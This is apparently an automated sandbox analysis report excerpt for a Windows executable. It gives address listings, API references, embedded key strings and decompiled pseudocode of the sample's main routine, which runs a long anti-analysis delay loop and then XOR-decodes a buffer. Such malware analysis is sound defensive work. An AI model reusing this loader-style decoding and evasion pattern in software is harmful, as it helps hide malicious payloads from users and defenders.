0x00403e1f
0x00403e1f
0x00403e28
0x00403e31
0x00403e3a
0x00403e40
0x00403e46
0x00403e4b
0x00403e53
0x00403e5c
0x00403e5c
0x00403e65
0x00403e6b
0x00403e71
0x00403e76
0x00403e7e
0x00403e87
0x00403e87
0x00403e90
0x00403e96
0x00403e9c
0x00403ea1
0x00403ea9
0x00403eb2
0x00403eb2
0x00403ebb
0x00403ec1
0x00403ec7
0x00403ecc
0x00403ed4
0x00403edd
0x00403edd
0x00403ee6
0x00403eec
0x00403ef2
0x00403ef7
0x00403eff
0x00403f08
0x00403f08
0x00403f11
0x00403f1a
0x00403f23
0x00403f29
0x00403f2f
0x00403f34
0x00403f3c
0x00403f45
0x00403f45
0x00403f4e
0x00403f54
0x00403f5a
0x00403f5f
0x00403f67
0x00403f70
0x00403f70
0x00403f79
0x00403f7f
0x00403f85
0x00403f8a
0x00403f92
0x00403f9b
0x00403f9b
0x00403fa4
0x00403faa
0x00403fb0
0x00403fb5
0x00403fbd
0x00403fc6
0x00403fc6
0x00403fcf
0x00403fd5
0x00403fdb
0x00403fe0
0x00403fe8
0x00403ff1
0x00403ff1
0x00403ffa
0x00404006
0x00404012
0x0040401e
0x00404024
0x00404029
0x00404031
0x0040403d
0x0040403d
0x00404049
0x00404055
0x0040405b
0x00404060
0x00404068
0x00404074
0x00404074
0x00404080
0x0040408c
0x00404092
0x00404097
0x0040409f
0x004040ab
0x004040ab
0x004040b7
0x004040c3
0x004040c9
0x004040ce
0x004040d6
0x004040e2
0x004040e2
0x004040ee
0x004040fa
0x00404100
0x00404105
0x0040410d
0x00404119
0x00404119
0x00404129
0x00404131
0x00404134
0x00404155
0x00404169
0x00404184
0x00000000
0x00404186
0x0040418c

APIs

FreeConsole.KERNELBASE ref: 004031C9
Sleep.KERNELBASE(00000000), ref: 00403920

Strings

tjyRiYjxZQ1atMdbL2um0lScF6f9IoaKt4HlT7B8L9R2pfmf2Q7vrjpXoWNJD1XojUYKYKsgO11CWLvMoRGL6Nocre, xrefs: 00404143
dwARBDHOT7y9AWBCdgCWx1MkegJdYHYLBE9B4m2r3iK36AcTlJEyeOZDRPKM2ke1oQqkNk2TyajCZ7BRGCHhRMLAEr, xrefs: 00404164

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: ConsoleFreeSleep
String ID: dwARBDHOT7y9AWBCdgCWx1MkegJdYHYLBE9B4m2r3iK36AcTlJEyeOZDRPKM2ke1oQqkNk2TyajCZ7BRGCHhRMLAEr$tjyRiYjxZQ1atMdbL2um0lScF6f9IoaKt4HlT7B8L9R2pfmf2Q7vrjpXoWNJD1XojUYKYKsgO11CWLvMoRGL6Nocre
API String ID: 1084192268-2513900498
Opcode ID: 39f03da1523d25783f9884cf7a53c6f479410edb7eafec8be40afa651e57522d
Instruction ID: 0754cd8ce46682081eca2b48ab319b9c6a789f8ecb08a8c0cdb913f863b461b7
Opcode Fuzzy Hash: 39f03da1523d25783f9884cf7a53c6f479410edb7eafec8be40afa651e57522d
Instruction Fuzzy Hash: 9CA23070A4A059DBEB108F85FA882EDBF34FB81385F9281A5D1C5320A9C77415B6CF4E

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 1.8, APIs: 1, Instructions: 535
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00401000(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				long _v44;
				signed int _v48;
				char _v49;
				char _v50;
				signed char _t289;
				signed int _t299;

				_t289 = __eax;
				_v20 = 0;
				_v8 =  *0x417268;
				_v8 =  *0x417264;
				_v8 =  *0x417260;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((__eax & 0x00000044) == 0) {
					_v8 =  *0x417254;
					_v8 =  *0x417250;
				}
				_v8 =  *0x41724c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x417248;
					_v8 =  *0x417244;
				}
				_v8 =  *0x417240;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x41723c;
					_v8 =  *0x417238;
				}
				_v8 =  *0x417234;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x417230;
					_v8 =  *0x41722c;
				}
				_v8 =  *0x417228;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v8 =  *0x417224;
					_v8 =  *0x417220;
				}
				_v24 =  *0x41721c;
				_v24 =  *0x417218;
				_v24 =  *0x417214;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x417210;
					_v24 =  *0x41720c;
				}
				_v24 =  *0x417208;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x417204;
					_v24 =  *0x417200;
				}
				_v24 =  *0x4171fc;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x4171f8;
					_v24 =  *0x4171f4;
				}
				_v24 =  *0x4171f0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x4171ec;
					_v24 =  *0x4171e8;
				}
				_v24 =  *0x4171e4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v24 =  *0x4171e0;
					_v24 =  *0x4171dc;
				}
				_v12 =  *0x4171d8;
				_v12 =  *0x4171d4;
				_v12 =  *0x4171d0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x4171cc;
					_v12 =  *0x4171c8;
				}
				_v12 =  *0x4171c4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 = "QSC]Io";
					_v12 =  *0x4171bc;
				}
				_v12 =  *0x4171b8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x4171b4;
					_v12 =  *0x4171b0;
				}
				_v12 =  *0x4171ac;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x4171a8;
					_v12 =  *0x4171a4;
				}
				_v12 =  *0x4171a0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v12 =  *0x41719c;
					_v12 =  *0x417198;
				}
				_v28 =  *0x417194;
				_v28 =  *0x417190;
				_v28 =  *0x41718c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x417188;
					_v28 =  *0x417184;
				}
				_v28 =  *0x417180;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x41717c;
					_v28 =  *0x417178;
				}
				_v28 =  *0x417174;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x417170;
					_v28 =  *0x41716c;
				}
				_v28 =  *0x417168;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x417164;
					_v28 =  *0x417160;
				}
				_v28 =  *0x41715c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v28 =  *0x417158;
					_v28 =  *0x417154;
				}
				_v32 =  *0x417150;
				_v32 =  *0x41714c;
				_v32 =  *0x417148;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x417144;
					_v32 =  *0x417140;
				}
				_v32 =  *0x41713c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x417138;
					_v32 =  *0x417134;
				}
				_v32 =  *0x417130;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x41712c;
					_v32 =  *0x417128;
				}
				_v32 =  *0x417124;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x417120;
					_v32 =  *0x41711c;
				}
				_v32 =  *0x417118;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v32 =  *0x417114;
					_v32 =  *0x417110;
				}
				_v36 =  *0x41710c;
				_v36 =  *0x417108;
				_v36 =  *0x417104;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x417100;
					_v36 =  *0x4170fc;
				}
				_v36 =  *0x4170f8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4170f4;
					_v36 =  *0x4170f0;
				}
				_v36 =  *0x4170ec;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4170e8;
					_v36 =  *0x4170e4;
				}
				_v36 =  *0x4170e0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4170dc;
					_v36 =  *0x4170d8;
				}
				_v36 =  *0x4170d4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v36 =  *0x4170d0;
					_v36 =  *0x4170cc;
				}
				_v16 =  *0x4170c8;
				_v16 =  *0x4170c4;
				_v16 =  *0x4170c0;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v16 =  *0x4170bc;
					_v16 =  *0x4170b8;
				}
				_v16 =  *0x4170b4;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v16 =  *0x4170b0;
					_v16 =  *0x4170ac;
				}
				_v16 =  *0x4170a8;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v16 =  *0x4170a4;
					_v16 =  *0x4170a0;
				}
				_v16 =  *0x41709c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v16 =  *0x417098;
					_v16 =  *0x417094;
				}
				_v16 =  *0x417090;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v16 =  *0x41708c;
					_v16 =  *0x417088;
				}
				_v40 =  *0x417084;
				_v40 =  *0x417080;
				_v40 =  *0x41707c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x417078;
					_v40 =  *0x417074;
				}
				_v40 =  *0x417070;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x41706c;
					_v40 =  *0x417068;
				}
				_v40 =  *0x417064;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x417060;
					_v40 =  *0x41705c;
				}
				_v40 =  *0x417058;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x417054;
					_v40 =  *0x417050;
				}
				_v40 =  *0x41704c;
				asm("fcomp qword [0x417258]");
				asm("fnstsw ax");
				if((_t289 & 0x00000044) == 0) {
					_v40 =  *0x417048;
					_v40 =  *0x417044;
				}
				_v44 = 0;
				_v20 = 0;
				while(_v20 < 0x5f5e100) {
					_v44 = _v44 + 1;
					_t289 = _v20 + 1;
					_v20 = _t289;
				}
				if(_v44 == 0x5f5e100) {
					_v48 = 0;
					while(1) {
						_t289 = _v48;
						if(_t289 >= _a12) {
							goto L91;
						}
						Sleep(0); // executed
						_t299 = _v48 & 0x80000003;
						if(_t299 < 0) {
							_t299 = (_t299 - 0x00000001 | 0xfffffffc) + 1;
						}
						_v50 =  *(_a4 + _t299) ^  *(_a8 + _v48);
						_v49 =  *(_a8 + _v48);
						 *(_a8 + _v48) = _v50 + _v49;
						 *(_a8 + _v48) =  *(_a8 + _v48) - _v49;
						_v48 = _v48 + 1;
					}
				}
				L91:
				return _t289;
			}

0x00401000
0x00401006
0x00401013
0x0040101c
0x00401025
0x0040102b
0x00401031
0x00401036
0x0040103e
0x00401047
0x00401047
0x00401050
0x00401056
0x0040105c
0x00401061
0x00401069
0x00401072
0x00401072
0x0040107b
0x00401081
0x00401087
0x0040108c
0x00401094
0x0040109d
0x0040109d
0x004010a6
0x004010ac
0x004010b2
0x004010b7
0x004010bf
0x004010c8
0x004010c8
0x004010d1
0x004010d7
0x004010dd
0x004010e2
0x004010ea
0x004010f3
0x004010f3
0x004010fc
0x00401105
0x0040110e
0x00401114
0x0040111a
0x0040111f
0x00401127
0x00401130
0x00401130
0x00401139
0x0040113f
0x00401145
0x0040114a
0x00401152
0x0040115b
0x0040115b
0x00401164
0x0040116a
0x00401170
0x00401175
0x0040117d
0x00401186
0x00401186
0x0040118f
0x00401195
0x0040119b
0x004011a0
0x004011a8
0x004011b1
0x004011b1
0x004011ba
0x004011c0
0x004011c6
0x004011cb
0x004011d3
0x004011dc
0x004011dc
0x004011e5
0x004011ee
0x004011f7
0x004011fd
0x00401203
0x00401208
0x00401210
0x00401219
0x00401219
0x00401222
0x00401228
0x0040122e
0x00401233
0x0040123b
0x00401244
0x00401244
0x0040124d
0x00401253
0x00401259
0x0040125e
0x00401266
0x0040126f
0x0040126f
0x00401278
0x0040127e
0x00401284
0x00401289
0x00401291
0x0040129a
0x0040129a
0x004012a3
0x004012a9
0x004012af
0x004012b4
0x004012bc
0x004012c5
0x004012c5
0x004012ce
0x004012d7
0x004012e0
0x004012e6
0x004012ec
0x004012f1
0x004012f9
0x00401302
0x00401302
0x0040130b
0x00401311
0x00401317
0x0040131c
0x00401324
0x0040132d
0x0040132d
0x00401336
0x0040133c
0x00401342
0x00401347
0x0040134f
0x00401358
0x00401358
0x00401361
0x00401367
0x0040136d
0x00401372
0x0040137a
0x00401383
0x00401383
0x0040138c
0x00401392
0x00401398
0x0040139d
0x004013a5
0x004013ae
0x004013ae
0x004013b7
0x004013c0
0x004013c9
0x004013cf
0x004013d5
0x004013da
0x004013e2
0x004013eb
0x004013eb
0x004013f4
0x004013fa
0x00401400
0x00401405
0x0040140d
0x00401416
0x00401416
0x0040141f
0x00401425
0x0040142b
0x00401430
0x00401438
0x00401441
0x00401441
0x0040144a
0x00401450
0x00401456
0x0040145b
0x00401463
0x0040146c
0x0040146c
0x00401475
0x0040147b
0x00401481
0x00401486
0x0040148e
0x00401497
0x00401497
0x004014a0
0x004014a9
0x004014b2
0x004014b8
0x004014be
0x004014c3
0x004014cb
0x004014d4
0x004014d4
0x004014dd
0x004014e3
0x004014e9
0x004014ee
0x004014f6
0x004014ff
0x004014ff
0x00401508
0x0040150e
0x00401514
0x00401519
0x00401521
0x0040152a
0x0040152a
0x00401533
0x00401539
0x0040153f
0x00401544
0x0040154c
0x00401555
0x00401555
0x0040155e
0x00401564
0x0040156a
0x0040156f
0x00401577
0x00401580
0x00401580
0x00401589
0x00401592
0x0040159b
0x004015a1
0x004015a7
0x004015ac
0x004015b4
0x004015bd
0x004015bd
0x004015c6
0x004015cc
0x004015d2
0x004015d7
0x004015df
0x004015e8
0x004015e8
0x004015f1
0x004015f7
0x004015fd
0x00401602
0x0040160a
0x00401613
0x00401613
0x0040161c
0x00401622
0x00401628
0x0040162d
0x00401635
0x0040163e
0x0040163e
0x00401647
0x0040164d
0x00401653
0x00401658
0x00401660
0x00401669
0x00401669
0x00401672
0x0040167b
0x00401684
0x0040168a
0x00401690
0x00401695
0x0040169d
0x004016a6
0x004016a6
0x004016af
0x004016b5
0x004016bb
0x004016c0
0x004016c8
0x004016d1
0x004016d1
0x004016da
0x004016e0
0x004016e6
0x004016eb
0x004016f3
0x004016fc
0x004016fc
0x00401705
0x0040170b
0x00401711
0x00401716
0x0040171e
0x00401727
0x00401727
0x00401730
0x00401736
0x0040173c
0x00401741
0x00401749
0x00401752
0x00401752
0x00401755
0x0040175c
0x0040176e
0x0040177d
0x00401768
0x0040176b
0x0040176b
0x00401789
0x0040178b
0x0040179d
0x0040179d
0x004017a3
0x00000000
0x00000000
0x004017a7
0x004017b0
0x004017b6
0x004017bc
0x004017bc
0x004017cf
0x004017da
0x004017ed
0x00401804
0x0040179a
0x0040179a
0x0040179d
0x0040180b
0x0040180b

APIs

Sleep.KERNELBASE(00000000), ref: 004017A7

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 272f3e7c8ea2fd50450bdbebd472dcb41169dc53156c7cfc81d0bc26d4b878b4
Instruction ID: e9b7d3426ea171765e26343d91221c403cc845bb7b28a5d46f209b9c2b69b68e
Opcode Fuzzy Hash: 272f3e7c8ea2fd50450bdbebd472dcb41169dc53156c7cfc81d0bc26d4b878b4
Instruction Fuzzy Hash: C1322D70949149EBDB008F85FA982EDBF70FB85341FA281A5D6D5321A9C3790672CF1E

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA9C Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040EA9C(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x43e6f4 = _t6;
				if(_t6 != 0) {
					 *0x43ed18 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040eab1
0x0040eab7
0x0040eabe
0x0040eac5
0x0040eacb
0x0040eac1
0x0040eac1
0x0040eac1

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040EAB1

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 560fddd6141b5a3c63d872ab9d5b2c8030221c2bac65c5b388294d21e2271bd0
Instruction ID: dd687414fc2a948548e844d3f7afd5d3bf845cacddb5058482c1284887a81a77
Opcode Fuzzy Hash: 560fddd6141b5a3c63d872ab9d5b2c8030221c2bac65c5b388294d21e2271bd0
Instruction Fuzzy Hash: 57D05E366553056AEB009F766C09BA23BDC9788395F148436B91DC6590F574C5508548

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9B4 Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040C9B4() {
				void* _t1;

				_t1 = E0040C942(0); // executed
				return _t1;
			}

0x0040c9b6
0x0040c9bc

APIs

__encode_pointer.LIBCMT ref: 0040C9B6

Part of subcall function 0040C942: TlsGetValue.KERNEL32(00000000,?,0040C9BB,00000000,004117FC,0043E2D0,00000000,00000314,?,0040E1BC,0043E2D0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040C954
Part of subcall function 0040C942: TlsGetValue.KERNEL32(00000001,?,0040C9BB,00000000,004117FC,0043E2D0,00000000,00000314,?,0040E1BC,0043E2D0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040C96B
Part of subcall function 0040C942: RtlEncodePointer.NTDLL(00000000,?,0040C9BB,00000000,004117FC,0043E2D0,00000000,00000314,?,0040E1BC,0043E2D0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040C9A9

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 5943e87eeaa406a02efa2695ab5bac0e6acf96f1b05f3d51ada65fa336a2ba62
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040AF5A Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E0040AF5A(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x43d2bc; // 0xbb30e455
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43e800 = _t6;
				 *0x43e7fc = _t22;
				 *0x43e7f8 = _t25;
				 *0x43e7f4 = _t21;
				 *0x43e7f0 = _t27;
				 *0x43e7ec = _t26;
				 *0x43e818 = ss;
				 *0x43e80c = cs;
				 *0x43e7e8 = ds;
				 *0x43e7e4 = es;
				 *0x43e7e0 = fs;
				 *0x43e7dc = gs;
				asm("pushfd");
				_pop( *0x43e810);
				 *0x43e804 =  *_t31;
				 *0x43e808 = _v0;
				 *0x43e814 =  &_a4;
				 *0x43e750 = 0x10001;
				_t11 =  *0x43e808; // 0x0
				 *0x43e704 = _t11;
				 *0x43e6f8 = 0xc0000409;
				 *0x43e6fc = 1;
				_t12 =  *0x43d2bc; // 0xbb30e455
				_v812 = _t12;
				_t13 =  *0x43d2c0; // 0x44cf1baa
				_v808 = _t13;
				 *0x43e748 = IsDebuggerPresent();
				_push(1);
				E004113EE(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x418678);
				if( *0x43e748 == 0) {
					_push(1);
					E004113EE(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x0040af5a
0x0040af5a
0x0040af5a
0x0040af5a
0x0040af5a
0x0040af5a
0x0040af5a
0x0040af60
0x0040af62
0x0040af62
0x0040ed5d
0x0040ed62
0x0040ed68
0x0040ed6e
0x0040ed74
0x0040ed7a
0x0040ed80
0x0040ed87
0x0040ed8e
0x0040ed95
0x0040ed9c
0x0040eda3
0x0040edaa
0x0040edab
0x0040edb4
0x0040edbc
0x0040edc4
0x0040edcf
0x0040edd9
0x0040edde
0x0040ede3
0x0040eded
0x0040edf7
0x0040edfc
0x0040ee02
0x0040ee07
0x0040ee13
0x0040ee18
0x0040ee1a
0x0040ee22
0x0040ee2d
0x0040ee3a
0x0040ee3c
0x0040ee3e
0x0040ee43
0x0040ee57

APIs

IsDebuggerPresent.KERNEL32 ref: 0040EE0D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040EE22
UnhandledExceptionFilter.KERNEL32(00418678), ref: 0040EE2D
GetCurrentProcess.KERNEL32(C0000409), ref: 0040EE49
TerminateProcess.KERNEL32(00000000), ref: 0040EE50

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 2a74bd232aa807f16bbd46ad9772d714bdc68ee0ba61dd64a849ca91486a8838
Instruction ID: 1c13c33f5ffa5bdd6569330ac2f1d5b3e939b07c41bf74436d5c72470a28eec8
Opcode Fuzzy Hash: 2a74bd232aa807f16bbd46ad9772d714bdc68ee0ba61dd64a849ca91486a8838
Instruction Fuzzy Hash: B521BFB49023149FE704EF66F989A847BE4FB08305F51A47AE518873E0E7B499818F5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD07 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DD07() {

				SetUnhandledExceptionFilter(E0040DCC5);
				return 0;
			}

0x0040dd0c
0x0040dd14

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000DCC5), ref: 0040DD0C

Memory Dump Source

Source File: 00000000.00000002.273538608.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273555829.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273571274.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273655427.000000000043F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6iWK0k820U.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 421f940019de4b4800d1aa59a3fed052a2a38844d70a423bf8ae89bb986a112f
Instruction ID: bb98565b58c6bba651afee912d724455d8805223e3408a11106aa587416a400d
Opcode Fuzzy Hash: 421f940019de4b4800d1aa59a3fed052a2a38844d70a423bf8ae89bb986a112f
Instruction Fuzzy Hash: 439022A02300000A8A0023B00C0800028C00B0C2023830030A20AC0080CAA080088208

Uniqueness

Uniqueness Score: -1.00%

Function 00420760 Relevance: 1.4, Instructions: 1445COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.273577619.000000000041C000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273527629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
